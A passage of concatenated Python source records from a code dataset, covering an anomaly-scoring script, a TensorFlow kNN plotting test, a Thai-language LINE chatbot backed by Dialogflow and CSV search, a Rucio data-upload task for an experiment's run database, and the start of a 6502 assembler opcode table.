min(SVMScore)) / (max(SVMScore) - min(SVMScore))\r\n\r\n \r\n #isoforest the more negative the more abnormal np.abs to abso value more positive is more abnormal now\r\n isolateForest = IsolationForest(contamination=\"auto\",behaviour=\"new\")\r\n isolateForest.fit(trainAll)\r\n isoScore = isolateForest.score_samples(testAll)\r\n isoScore = np.abs(isoScore)\r\n isoScore = (isoScore - min(isoScore)) / (max(isoScore) - min(isoScore))\r\n\r\n #higher score means more abnormal\r\n AverageScore = (outlierScore + SVMScore + isoScore) / 3\r\n \r\n return AverageScore\r\n\r\n\"\"\"\r\nConvert structured array of categorical variables (represented as byte\r\nstrings) to a list of dictionaries with values as decoded strings\r\n\"\"\"\r\ndef catFeatureDict(catArray,catAttrNames):\r\n catDict = []\r\n for row in catArray:\r\n dictRow = {}\r\n for col in range(len(row)):\r\n dictRow[catAttrNames[col]] = row[col]\r\n catDict.append(dictRow)\r\n \r\n return catDict\r\n \r\nif __name__ == \"__main__\":\r\n data = np.genfromtxt('trainData.csv',delimiter=',',dtype=None,\r\n encoding=None)\r\n trainData = data[::2]\r\n testData = data[1::2]\r\n anomScores = predictAnomalies(trainData,testData)\r\n print(anomScores)\r\n f = open(\"Scores.txt\", \"w\")\r\n i = 1\r\n for score in anomScores:\r\n f.write(str(i))\r\n f.write(\")\")\r\n f.write(str(score))\r\n f.write(\"\\n\")\r\n i = i +2\r\n f.close\r\n ","sub_path":"anomalyIds.py","file_name":"anomalyIds.py","file_ext":"py","file_size_in_byte":3928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"651897397","text":"#!/usr/bin/env python3\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport tensorflow as tf\nfrom select_mod_knn_op import SelectModKnn as SelectKnn\n\n#extent = 4\n\ngranularity = 100\npsize = 3\n\n\nx,y = np.meshgrid(np.linspace(0,4,granularity),np.linspace(0,4,granularity))\n\n#make it position vectors\npos = np.concatenate( [np.expand_dims(x,axis=2),np.expand_dims(y,axis=2)],axis=-1 )\npos = np.reshape(pos, [-1,2])\ncols = pos[...,0]*0.\n\n\ntransform = np.expand_dims(np.random.rand(2,2),axis=0)\ntpos = np.expand_dims(pos, axis=1)\ntpos = tpos*transform\ntpos = np.sum(tpos, axis=-1)\n\nradius_in_trsf = (np.max(tpos[...,0])-np.min(tpos[...,0]))/20.\n\ncols = np.where((tpos[...,0]-tpos[granularity//2:granularity//2+1,0])**2 + \n (tpos[...,1]-tpos[granularity//2:granularity//2+1,1])**2 < radius_in_trsf, 1, cols)\n\nselpos = pos#[np.max(pos,axis=-1) list[dict]\n\n all_bubbles = []\n for each in search_result:\n แถวที่พบ = each[\"true_row\"]\n คำที่ค้นหา = text_from_user\n คะแนนความเที่ยงตรง = each[\"score\"]\n คอลัมน์ที่ค้นพบคำนี้ = each[\"col_name\"]\n\n รายการที่ค้นพบ = each[\"result\"] #dictionary\n\n bubble = flex_find_row(แถวที่พบ,คำที่ค้นหา,คะแนนความเที่ยงตรง,คอลัมน์ที่ค้นพบคำนี้,รายการที่ค้นพบ)\n all_bubbles.append(bubble)\n\n flex_to_reply = make_carousel(all_bubble = all_bubbles)\n\n flex_to_reply = SetMessage_Object(flex_to_reply)\n reply_msg(reply_token,data=flex_to_reply,bot_access_key=channel_access_token)\n\n return 'OK'\n \n elif action == \"FIND_VALUE\":\n # 1. ตอบกลับไป กรุณาใส่ตีเวิด\n all_text = []\n for each in response:\n text = TextSendMessage(text=each)\n all_text.append(text)\n \n line_bot_api.reply_message(reply_token,messages=all_text) #reply messageกลับไป\n\n return 'OK'\n \n elif action == \"FIND_VALUE_GET_COLUMN\":\n\n all_text = []\n for each in response:\n text = TextSendMessage(text=each)\n all_text.append(text)\n\n line_bot_api.reply_message(reply_token,messages=all_text) #reply messageกลับไป\n\n return 'OK'\n \n elif action == \"FIND_VALUE_GET_COLUMN_RESULT\":\n\n col_to_find = response[0] ## dialogflow บอกว่า user ต้องการค้นหา column ไหน\n\n CSV = csvFinder(csvPath=\"./CSVs/รายการบ้านสองชั้น.csv\")\n CSV.set_finding_column(\"รายการ\")\n CSV.add_stop_word(\"จำนวน\",\"ปริมาณ\",\"ราคา\",\"หน่วย\",\"อยากทราบ\",\"หน่อย\",\"ถาม\")\n search_result = CSV.find_value(val=text_from_user,col_to_find=col_to_find,limit=10) #ค้นหา\n\n results = [i[\"result\"] for i in search_result]\n\n flex = flex_find_value(คำที่ค้นหา=text_from_user,results=results)\n # print(flex)\n flex_to_reply = SetMessage_Object(flex)\n reply_msg(reply_token,data=flex_to_reply,bot_access_key=channel_access_token)\n\n return 'OK'\n\n # CSV = csvFinder(csvPath=os.path.join(csv_storage_path,csv_files[0]))\n # res = CSV.find_row(val=text_from_user,limit=3)\n\n@handler.add(FollowEvent)\ndef Greeting(event):\n reply_token = event.reply_token #รีพลายโทเคน\n userid = event.source.user_id #ยูซเซอไอดี\n\n\n action1 = MessageAction(label=\"ค้นหาแบบแถว\",text=\"ค้นหาแบบแถว\")\n action2 = MessageAction(label=\"ค้นหาแบบคอลัมน์\",text=\"ค้นหาแบบคอลัมน์\")\n\n qbtn1 = QuickReplyButton(action=action1)\n qbtn2 = QuickReplyButton(action=action2)\n\n qreply = QuickReply(items=[qbtn1,qbtn2])\n\n text = TextSendMessage(text = \"สวัสดีครับ ยินดีต้อนรับสู่บริการของเรา\",quick_reply=qreply)\n\n line_bot_api.reply_message(reply_token,messages=text) #reply messageกลับไป\n \n\n\nif __name__ == \"__main__\":\n os.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = \"Credentials.json\"\n os.environ[\"DIALOGFLOW_PROJECT_ID\"] = \"axial-device-255804\"\n app.run(port=5000,debug=True)\n\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"381349733","text":"# -*- coding: utf-8 -*-\nimport json\nimport os\nfrom admix.helper import helper\nimport time\nimport shutil\n\nfrom admix.interfaces.database import ConnectMongoDB\nfrom admix.helper.decorator import Collector\n\n#get Rucio imports done:\nfrom admix.interfaces.rucio_dataformat import ConfigRucioDataFormat\nfrom admix.interfaces.rucio_summoner import RucioSummoner\nfrom admix.utils import make_did\nfrom admix.utils.list_file_replicas import list_file_replicas\nimport pymongo\n\n@Collector\nclass Upload():\n\n def __init__(self):\n pass\n\n def init(self):\n helper.global_dictionary['logger'].Info(f'Init task {self.__class__.__name__}')\n\n open(\"/tmp/admix-upload_from_lngs\", 'a').close()\n\n #Take all data types categories\n self.NORECORDS_DTYPES = helper.get_hostconfig()['norecords_types']\n self.RAW_RECORDS_DTYPES = helper.get_hostconfig()['raw_records_types']\n self.RECORDS_DTYPES = helper.get_hostconfig()['records_types']\n\n # Choose which RSE you want upload to\n self.UPLOAD_TO = helper.get_hostconfig()['upload_to']\n\n #Choose which data type you want to treat\n self.DTYPES = self.NORECORDS_DTYPES + self.RECORDS_DTYPES + self.RAW_RECORDS_DTYPES\n\n if helper.global_dictionary.get('high'):\n self.DTYPES = self.NORECORDS_DTYPES \n\n if helper.global_dictionary.get('low'):\n self.DTYPES = self.RECORDS_DTYPES + self.RAW_RECORDS_DTYPES\n\n\n self.DATADIR = helper.get_hostconfig()['path_data_to_upload']\n self.periodic_check = helper.get_hostconfig()['upload_periodic_check']\n\n #Init the runDB\n self.db = ConnectMongoDB()\n\n #Init Rucio for later uploads and handling:\n self.rc = RucioSummoner(helper.get_hostconfig(\"rucio_backend\"))\n self.rc.SetRucioAccount(helper.get_hostconfig('rucio_account'))\n self.rc.SetConfigPath(helper.get_hostconfig(\"rucio_cli\"))\n self.rc.SetProxyTicket(helper.get_hostconfig('rucio_x509'))\n self.rc.SetHost(helper.get_hostconfig('host'))\n self.rc.ConfigHost()\n self.rc.SetProxyTicket(\"rucio_x509\")\n\n\n def find_next_run_to_upload(self):\n# cursor = self.db.db.find({'status': 'eb_ready_to_upload', 'bootstrax.state': 'done' }, {'number': 1, 'data': 1})\n cursor = self.db.db.find({'status': { '$in': ['eb_ready_to_upload','transferring']}, 'bootstrax.state': 'done' }, {'number': 1, 'data': 1})\n id_run = 0\n min_run = float('inf')\n\n for run in cursor:\n print(run['number'])\n if run['number']<10000:\n continue\n# if run['number'] not in [11345, 11346, 11379]:\n# continue\n\n if run['number'] < min_run:\n min_run = run['number']\n id_run = run['_id']\n print(\" \",min_run)\n return id_run\n\n\n def find_next_run_and_dtype_to_upload(self):\n cursor = self.db.db.find({'status': { '$in': ['eb_ready_to_upload','transferring']}, 'bootstrax.state': 'done' }, {'number': 1, 'data': 1, 'bootstrax': 1}).sort('number',pymongo.ASCENDING)\n id_run = 0\n min_run = float('inf')\n\n cursor = list(cursor)\n\n helper.global_dictionary['logger'].Info('\\t==> Runs in queue: {0}'.format(len(cursor)))\n\n for run in cursor:\n\n # Get run number\n number = run['number']\n\n # Forget about old runs\n if number<10000:\n continue\n\n # For debugging: select a specific run\n# if number not in [7235]:\n# continue\n# if run['number'] not in [11345, 11346, 11379]:\n# continue\n\n # Extracts the correct Event Builder machine who processed this run\n bootstrax = run['bootstrax']\n eb = bootstrax['host'].split('.')[0]\n\n # Look for the first data type available to be uploaded\n datum = None\n for dtype in self.DTYPES:\n\n # start patch\n# run_numbers = ['010644', '010801', '010802', '010803', '010878', '010879', '010910', '010912', '010913', '010919', '010932', '010933', '010934', '010935', '010936', '010937', '010938', '010939', '010940', '010941', '010942', '010943', '010944', '010945', '010946', '010947', '010948', '010951', '010952', '010964', '010966', '010967', '010973', '010976', '010977', '010978', '010979', '010980', '010982', '010984', '010985', '010986', '010987', '010988', '010989', '010990', '010991', '010992', '010993', '010994', '010995', '010996', '010997', '010998', '010999', '011000', '011001', '011002', '011003', '011004', '011005', '011006', '011007', '011008', '011009', '011010', '011011', '011012', '011013', '011014', '011015', '011016', '011017', '011018', '011019', '011020', '011021', '011022', '011023', '011024', '011025', '011026', '011027', '011028', '011029', '011030', '011032', '011050', '011051']\n# if '%06d' % number not in run_numbers:\n# continue\n# dtypes = ['peaklets', 'lone_hits', 'records', 'veto_regions', 'pulse_counts']\n# if dtype not in dtypes:\n# continue\n# eb = 'eb3'\n\n\n #if dtype != \"raw_records_aqmon\":\n # continue\n\n # search if dtype still has to be uploaded\n for d in run['data']:\n if d['type'] == dtype and eb in d['host'] and ('status' not in d or ('status' in d and d['status'] == 'eb_ready_to_upload')):\n datum = d\n break\n \n if datum is not None:\n break\n\n # If there is a candidate data type, return run_id and data type\n if datum is not None:\n return run['_id'], datum\n\n return 0,''\n\n\n\n\n def add_rule(self,run_number, dtype, hash, rse, datum=None, lifetime=None, update_db=True):\n did = make_did(run_number, dtype, hash)\n if dtype in self.NORECORDS_DTYPES:\n priority = 1\n else:\n priority = 3\n result = self.rc.AddRule(did, rse, lifetime=lifetime, priority=priority)\n #if result == 1:\n # return\n helper.global_dictionary['logger'].Info('\\t==> Run {0}, data type {1}: rule added: {2} ---> {3}'.format(run_number,dtype,did,rse))\n\n if update_db:\n self.db.db.find_one_and_update({'number': run_number},\n {'$set': {'status': 'transferring'}}\n )\n\n rucio_rule = self.rc.GetRule(did, rse=rse)\n updated_fields = {'host': \"rucio-catalogue\",\n 'type': dtype,\n 'location': rse,\n 'lifetime': rucio_rule['expires'],\n 'status': 'transferring',\n 'did': did,\n 'protocol': 'rucio'\n }\n\n if datum == None:\n data_dict = updated_fields\n else:\n data_dict = datum.copy()\n data_dict.update(updated_fields)\n\n docid = self.db.db.find_one({'number': run_number}, {'_id': 1})['_id']\n self.db.AddDatafield(docid, data_dict)\n\n\n def add_conditional_rule(self,run_number, dtype, hash, from_rse, to_rse, datum=None, lifetime=None, update_db=True):\n did = make_did(run_number, dtype, hash)\n if dtype in self.NORECORDS_DTYPES:\n priority = 1\n else:\n priority = 3\n result = self.rc.AddConditionalRule(did, from_rse, to_rse, lifetime=lifetime, priority=priority)\n #if result == 1:\n # return\n helper.global_dictionary['logger'].Info('\\t==> Run {0}, data type {1}: conditional rule added: {2} ---> {3}'.format(run_number,dtype,did,to_rse))\n\n if update_db:\n self.db.db.find_one_and_update({'number': run_number},\n {'$set': {'status': 'transferring'}}\n )\n\n rucio_rule = self.rc.GetRule(did, rse=to_rse)\n updated_fields = {'host': \"rucio-catalogue\",\n 'type': dtype,\n 'location': to_rse,\n 'lifetime': rucio_rule['expires'],\n 'status': 'transferring',\n 'did': did,\n 'protocol': 'rucio'\n }\n\n if datum == None:\n data_dict = updated_fields\n else:\n data_dict = datum.copy()\n data_dict.update(updated_fields)\n\n docid = self.db.db.find_one({'number': run_number}, {'_id': 1})['_id']\n self.db.AddDatafield(docid, data_dict)\n\n\n\n def run(self,*args, **kwargs):\n helper.global_dictionary['logger'].Info(f'Run task {self.__class__.__name__}')\n\n if helper.global_dictionary.get('high'):\n helper.global_dictionary['logger'].Info(f'Only high level datatypes')\n\n if helper.global_dictionary.get('low'):\n helper.global_dictionary['logger'].Info(f'Only low level datatypes')\n\n\n # Get a new run to upload\n id_to_upload, datum = self.find_next_run_and_dtype_to_upload()\n if id_to_upload == 0:\n helper.global_dictionary['logger'].Info('\\t==> No data type available to upload')\n return 0\n\n # Load the run\n run = self.db.db.find_one({'_id': id_to_upload}, {'number': 1, 'data': 1, 'bootstrax': 1})\n\n # Get run number\n number = run['number']\n\n # Set run status to \"transferring\"\n self.db.SetStatus(number, 'transferring')\n\n # Extracts the correct Event Builder machine who processed this run\n bootstrax = run['bootstrax']\n eb = bootstrax['host'].split('.')[0]\n\n# eb = 'eb3'\n\n# # Performs upload on selected run\n# helper.global_dictionary['logger'].Info('Uploading run {0} from {1}'.format(number,eb))\n\n\n # Attempting to book this data type\n dtype = datum['type']\n file = datum['location'].split('/')[-1]\n hash = file.split('-')[-1]\n helper.global_dictionary['logger'].Info('\\t==> Run {0}, trying to book data type {1} for uploading. Starting match'.format(number,dtype))\n\n # Books the eb data entry by setting its status to the PID of the process\n PID = str(os.getpid())\n self.db.db.find_one_and_update({'_id': id_to_upload,'data': {'$elemMatch': datum}},\n {'$set': {'data.$.status': PID}})\n\n # Wait for 20 seconds\n time.sleep(20)\n\n # Then check if this status is still equal to the same PID\n run = self.db.db.find_one({'_id': id_to_upload}, {'number': 1, 'data': 1, 'bootstrax': 1})\n datum = None\n for d in run['data']:\n if d['type'] == dtype and eb in d['host'] and hash in d['location'] and d['status']==PID:\n datum = d\n break\n \n # If there is no data available to upload any more, exit\n if datum is None:\n helper.global_dictionary['logger'].Info('\\t==> Run {0}, lost challenge, data type {1} not available any more'.format(number,dtype))\n return 0\n\n # Match won. Proceeding with uploading\n helper.global_dictionary['logger'].Info('\\t==> Run {0}, match won, starting uploading data type {1}'.format(number,dtype))\n\n # Modify data type status to \"transferring\"\n self.db.db.find_one_and_update({'_id': id_to_upload,'data': {'$elemMatch': datum}},\n {'$set': {'data.$.status': \"transferring\"}})\n\n # Wait for 3 seconds\n time.sleep(3)\n\n # Reloading the updated datum\n run = self.db.db.find_one({'_id': id_to_upload}, {'number': 1, 'data': 1, 'bootstrax': 1})\n datum = None\n for d in run['data']:\n if d['type'] == dtype and eb in d['host'] and hash in d['location']:\n datum = d\n break\n\n # Check, for coherency, if there is no rucio entry in DB for this data type\n in_rucio_upload_rse = False\n in_rucio_somewhere_else = False\n for d in run['data']:\n if d['type'] == datum['type'] and d['host'] == 'rucio-catalogue' and hash in d['did'] and d['location'] == self.UPLOAD_TO:\n in_rucio_upload_rse = True\n if d['type'] == datum['type'] and d['host'] == 'rucio-catalogue' and hash in d['did'] and d['location'] != self.UPLOAD_TO:\n in_rucio_somewhere_else = True\n\n if in_rucio_upload_rse:\n helper.global_dictionary['logger'].Info('\\t==> Run {0}, data type {1} has already a DB entry for RSE {2}. Forced to stop'.format(number,dtype,self.UPLOAD_TO))\n return 0\n\n if in_rucio_somewhere_else:\n helper.global_dictionary['logger'].Info('\\t==> Run {0}, data type {1} has already a DB entry for some external RSE. Forced to stop'.format(number,dtype))\n return 0\n\n # Preparing relevant info for uploading\n \n file = datum['location'].split('/')[-1]\n hash = file.split('-')[-1]\n upload_path = os.path.join(self.DATADIR, eb, file)\n did = make_did(number, dtype, hash)\n\n # Querying Rucio: if a rule exists already for this DID on LNGS, skip uploading\n rucio_rule = self.rc.GetRule(upload_structure=did, rse=self.UPLOAD_TO)\n if rucio_rule['exists']:\n helper.global_dictionary['logger'].Info('\\t==> Run {0}, data type {1} has already a Rucio rule for RSE {2}. Forced to stop'.format(number,dtype,self.UPLOAD_TO))\n return 0\n \n # Finally, start uploading with Rucio\n helper.global_dictionary['logger'].Info('\\t==> Run {0}, data type {1}, start uploading, DID = {2}'.format(number,dtype,did))\n result = self.rc.Upload(did, upload_path, self.UPLOAD_TO, lifetime=None)\n helper.global_dictionary['logger'].Info('\\t==> Run {0}, data type {1}, uploaded, DID = {2}'.format(number,dtype,did))\n\n # Wait for 10 seconds\n time.sleep(10)\n \n # Checking the status of this new upload rule\n rucio_rule = self.rc.GetRule(upload_structure=did, rse=self.UPLOAD_TO)\n if rucio_rule['state'] != 'OK':\n helper.global_dictionary['logger'].Info('\\t==> Run {0}, data type {1}, according to Rucio, uploading failed. Forced to stop'.format(number,dtype))\n exit()\n\n # Checking the actual number of files uploaded\n# nfiles = len(list_file_replicas(number, dtype, hash, rucio_rule['rse']))\n# if nfiles != datum['file_count']:\n# helper.global_dictionary['logger'].Info('\\t==> Run {0}, data type {1}, unconsistent number of files (Rucio: {2}, DB: {3}). Forced to stop'.format(number,dtype,nfiles,datum['file_count']))\n# exit() \n\n # Update the eb data entry with status \"transferred\"\n self.db.db.find_one_and_update({'_id': id_to_upload,'data': {'$elemMatch': datum}},\n {'$set': {'data.$.status': \"transferred\"}})\n\n # Add a new data field with LNGS as RSE and with status \"trasferred\"\n data_dict = datum.copy()\n data_dict.update({'host': \"rucio-catalogue\",\n 'type': dtype,\n 'location': self.UPLOAD_TO,\n 'lifetime': rucio_rule['expires'],\n 'status': 'transferred',\n 'did': did,\n 'protocol': 'rucio'\n })\n self.db.AddDatafield(run['_id'], data_dict)\n\n # set a rule to ship data on GRID\n if rucio_rule['state'] == 'OK':\n if dtype in self.NORECORDS_DTYPES:\n self.add_rule(number, dtype, hash, 'UC_DALI_USERDISK',datum=datum)\n# self.add_rule(number, dtype, hash, 'UC_OSG_USERDISK',datum=datum)\n# self.add_conditional_rule(number, dtype, hash, 'UC_DALI_USERDISK', 'UC_OSG_USERDISK',datum=datum)\n self.add_conditional_rule(number, dtype, hash, 'UC_DALI_USERDISK', 'CCIN2P3_USERDISK',datum=datum)\n elif dtype in self.RECORDS_DTYPES:\n# self.add_rule(number, dtype, hash, 'UC_OSG_USERDISK',datum=datum)\n self.add_rule(number, dtype, hash, 'CCIN2P3_USERDISK',datum=datum)\n# self.add_conditional_rule(number, dtype, hash, 'UC_OSG_USERDISK', 'CCIN2P3_USERDISK',datum=datum)\n self.add_conditional_rule(number, dtype, hash, 'CCIN2P3_USERDISK', 'SURFSARA_USERDISK',datum=datum)\n elif dtype in self.RAW_RECORDS_DTYPES:\n# self.add_rule(number, dtype, hash, 'UC_OSG_USERDISK',datum=datum)\n self.add_rule(number, dtype, hash, 'CCIN2P3_USERDISK',datum=datum)\n# self.add_conditional_rule(number, dtype, hash, 'UC_OSG_USERDISK', 'CNAF_TAPE2_USERDISK',datum=datum)\n self.add_conditional_rule(number, dtype, hash, 'CCIN2P3_USERDISK', 'CNAF_TAPE2_USERDISK',datum=datum)\n\n return 0\n\n\n def __del__(self):\n pass\n","sub_path":"admix/tasks/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":17175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"560641607","text":"import re\r\n\r\nopcodes = {\r\n '---': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'ADC': {'SNGL': 'null', 'INDY': '71', 'IMM': '69', 'INDX': '61', 'ZPX': '75', 'ABS': '6d', 'ABSY': '79', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': '65', 'ABSX': '7d'},\r\n 'AND': {'SNGL': 'null', 'INDY': '31', 'IMM': '29', 'INDX': '21', 'ZPX': '35', 'ABS': '2d', 'ABSY': '39', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': '25', 'ABSX': '3d'},\r\n 'ASL': {'SNGL': '0a', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': '16', 'ABS': '0e', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': '06', 'ABSX': '1e'},\r\n 'BCC': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': '90', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'BCS': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'b0', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'BEQ': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'f0', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'BIT': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': '2c', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': '24', 'ABSX': 'null'},\r\n 'BMI': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': '30', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'BNE': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'd0', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'BPL': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': '10', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'BRK': {'SNGL': '00', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'BVC': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': '50', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'BVS': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': '70', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'CLC': {'SNGL': '18', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'CLD': {'SNGL': 'd8', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'CLI': {'SNGL': '58', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'CLV': {'SNGL': 'b8', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'CMP': {'SNGL': 'null', 'INDY': 'd1', 'IMM': 'c9', 'INDX': 'c1', 'ZPX': 'd5', 'ABS': 'cd', 'ABSY': 'd9', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'c5', 'ABSX': 'dd'},\r\n 'CPX': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'e0', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'ec', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'e4', 'ABSX': 'null'},\r\n 'CPY': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'c0', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'cc', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'c4', 'ABSX': 'null'},\r\n 'DEC': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'd6', 'ABS': 'ce', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'c6', 'ABSX': 'de'},\r\n 'DEX': {'SNGL': 'ca', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'DEY': {'SNGL': '88', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'EOR': {'SNGL': 'null', 'INDY': '51', 'IMM': '49', 'INDX': '41', 'ZPX': '55', 'ABS': '4d', 'ABSY': '59', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': '45', 'ABSX': '5d'},\r\n 'INC': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'f6', 'ABS': 'ee', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'e6', 'ABSX': 'fe'},\r\n 'INX': {'SNGL': 'e8', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'INY': {'SNGL': 'c8', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'JMP': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': '4c', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': '6c', 'ZP': 'null', 'ABSX': 'null'},\r\n 'JSR': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': '20', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'LDA': {'SNGL': 'null', 'INDY': 'b1', 'IMM': 'a9', 'INDX': 'a1', 'ZPX': 'b5', 'ABS': 'ad', 'ABSY': 'b9', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'a5', 'ABSX': 'bd'},\r\n 'LDX': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'a2', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'ae', 'ABSY': 'be', 'BRA': 'null', 'ZPY': 'b6', 'IND': 'null', 'ZP': 'a6', 'ABSX': 'null'},\r\n 'LDY': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'a0', 'INDX': 'null', 'ZPX': 'b4', 'ABS': 'ac', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'a4', 'ABSX': 'bc'},\r\n 'LSR': {'SNGL': '4a', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': '56', 'ABS': '4e', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': '46', 'ABSX': '5e'},\r\n 'NOP': {'SNGL': 'ea', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'ORA': {'SNGL': 'null', 'INDY': '11', 'IMM': '09', 'INDX': '01', 'ZPX': '15', 'ABS': '0d', 'ABSY': '19', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': '05', 'ABSX': '1d'},\r\n 'PHA': {'SNGL': '48', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 